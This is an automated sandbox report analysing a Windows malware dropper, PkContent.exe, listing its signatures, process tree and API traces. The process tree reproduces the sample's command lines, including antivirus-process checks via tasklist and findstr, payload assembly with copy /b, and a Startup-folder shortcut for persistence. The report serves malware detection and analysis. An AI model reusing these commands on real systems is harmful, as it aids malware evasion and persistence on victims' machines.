Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PkContent.exe

Overview

General Information

Sample name:PkContent.exe
Analysis ID:1577543
MD5:87c051a77edc0cc77a4d791ef72367d1
SHA1:5d5bab642235f0af7d9afe3cacec5ae2a4cfc8e5
SHA256:b63bf28780e02bf0bb1bb59dec135e6263f4c582724c95eee0519b279022f31c
Tags:18521511316185215113209bulletproofexenjratuser-abus3reports
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
AI detected suspicious sample
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • PkContent.exe (PID: 4436 cmdline: "C:\Users\user\Desktop\PkContent.exe" MD5: 87C051A77EDC0CC77A4D791EF72367D1)
    • cmd.exe (PID: 6532 cmdline: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6504 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6488 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6192 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6396 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 3524 cmdline: cmd /c md 724598 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6104 cmdline: findstr /V "WowLiberalCalOfficer" Weight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 2272 cmdline: cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Thermal.pif (PID: 4836 cmdline: Thermal.pif y MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 4760 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 6540 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 5640 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HermesKey.scr (PID: 6396 cmdline: "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , ProcessId: 5640, ProcessName: wscript.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Thermal.pif y, CommandLine: Thermal.pif y, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6532, ParentProcessName: cmd.exe, ProcessCommandLine: Thermal.pif y, ProcessId: 4836, ProcessName: Thermal.pif
Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 4836, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif, ProcessId: 4836, TargetFilename: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" , ProcessId: 5640, ProcessName: wscript.exe

Data Obfuscation

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4760, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6532, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 6396, ProcessName: findstr.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PkContent.exeAvira: detected
Source: PkContent.exeReversingLabs: Detection: 63%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
Source: PkContent.exeJoe Sandbox ML: detected
Source: PkContent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: PkContent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_007D4005
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_007D494A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_007D3CE2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_007DC2FF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DCD14 FindFirstFileW,FindClose,11_2_007DCD14
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_007DCD9F
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_007DF5D8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_007DF735
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_007DFA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00914005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00914005
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0091494A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0091C2FF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,17_2_0091CD9F
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091CD14 FindFirstFileW,FindClose,17_2_0091CD14
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0091F5D8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0091F735
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0091FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,17_2_0091FA36
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00913CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00913CE2
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\724598\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\724598Jump to behavior
Source: unknownDNS traffic detected: query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_007E29BA
Source: global trafficDNS traffic detected: DNS query: ctIHfwPuGQOYqdJrz.ctIHfwPuGQOYqdJrz
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PkContent.exe, 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: PkContent.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: PkContent.exe, 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmp, PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmp, HermesKey.scr, 00000011.00000002.3935835156.0000000000979000.00000002.00000001.01000000.00000008.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: HermesKey.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000003.2114681102.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, Thermal.pif, 0000000B.00000002.3937117331.0000000001130000.00000004.00000020.00020000.00000000.sdmp, Thermal.pif.2.dr, Ought.0.dr, HermesKey.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_007E4830
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00924830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00924830
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007E4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_007E4632
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007FD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_007FD164
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0093D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,17_2_0093D164

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4254: CreateFileW,DeviceIoControl,CloseHandle,11_2_007D4254
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_007C8F2E
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_007D5778
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00915778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,17_2_00915778
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PgJuneJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\ReceptorsTeethJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PorcelainExhaustJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\MonsterRaymondJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\FirewireBrosJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Windows\PortugalChargesJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_0040497C0_2_0040497C
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_00406ED20_2_00406ED2
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004074BB0_2_004074BB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0077B02011_2_0077B020
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007794E011_2_007794E0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00779C8011_2_00779C80
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007923F511_2_007923F5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007F840011_2_007F8400
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A650211_2_007A6502
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A265E11_2_007A265E
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0077E6F011_2_0077E6F0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079282A11_2_0079282A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A89BF11_2_007A89BF
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A6A7411_2_007A6A74
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007F0A3A11_2_007F0A3A
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00780BE011_2_00780BE0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079CD5111_2_0079CD51
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007CEDB211_2_007CEDB2
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D8E4411_2_007D8E44
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007F0EB711_2_007F0EB7
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A6FE611_2_007A6FE6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007933B711_2_007933B7
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0078D45D11_2_0078D45D
